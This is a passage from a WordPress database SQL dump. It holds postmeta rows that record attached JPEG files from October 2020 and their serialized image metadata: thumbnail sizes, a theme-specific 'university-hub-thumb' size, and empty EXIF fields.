(26014, 10560, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-21.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-21-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-21-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-21-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-21-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26015, 10561, '_wp_attached_file', '2020/10/021063-20.jpg'),
(26016, 10561, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-20.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-20-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-20-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-20-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-20-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-20-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26017, 10562, '_wp_attached_file', '2020/10/021063-19.jpg'),
(26018, 10562, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-19.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-19-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-19-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-19-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-19-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26019, 10563, '_wp_attached_file', '2020/10/021063-18.jpg'),
(26020, 10563, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-18.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-18-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-18-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-18-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-18-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26021, 10564, '_wp_attached_file', '2020/10/021063-16.jpg'),
(26022, 10564, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-16.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-16-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-16-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-16-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-16-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26023, 10565, '_wp_attached_file', '2020/10/021063-13.jpg'),
(26024, 10565, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-13.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-13-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-13-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-13-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-13-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26025, 10566, '_wp_attached_file', '2020/10/021063-11.jpg'),
(26026, 10566, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-11.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-11-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-11-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-11-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-11-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26027, 10567, '_wp_attached_file', '2020/10/021063-10.jpg'),
(26028, 10567, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-10.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-10-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-10-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-10-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-10-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26029, 10568, '_wp_attached_file', '2020/10/021063-09.jpg'),
(26030, 10568, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-09.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-09-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-09-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-09-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-09-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26031, 10569, '_wp_attached_file', '2020/10/021063-08.jpg'),
(26032, 10569, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-08.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-08-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-08-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-08-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-08-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26033, 10570, '_wp_attached_file', '2020/10/021063-07.jpg'),
(26034, 10570, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-07.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-07-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-07-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-07-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-07-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26035, 10571, '_wp_attached_file', '2020/10/021063-06.jpg'),
(26036, 10571, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-06.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-06-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-06-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-06-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-06-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26037, 10572, '_wp_attached_file', '2020/10/021063-05.jpg'),
(26038, 10572, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-05.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-05-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-05-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-05-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-05-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26039, 10573, '_wp_attached_file', '2020/10/021063-04.jpg'),
(26040, 10573, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-04.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-04-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-04-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-04-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-04-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26041, 10574, '_wp_attached_file', '2020/10/021063-03.jpg'),
(26042, 10574, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-03.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-03-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-03-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-03-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-03-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26043, 10575, '_wp_attached_file', '2020/10/021063-02.jpg'),
(26044, 10575, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-02-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-02-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-02-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-02-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26045, 10576, '_wp_attached_file', '2020/10/021063-26.jpg'),
(26046, 10576, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-26.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-26-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-26-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-26-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-26-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-26-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13: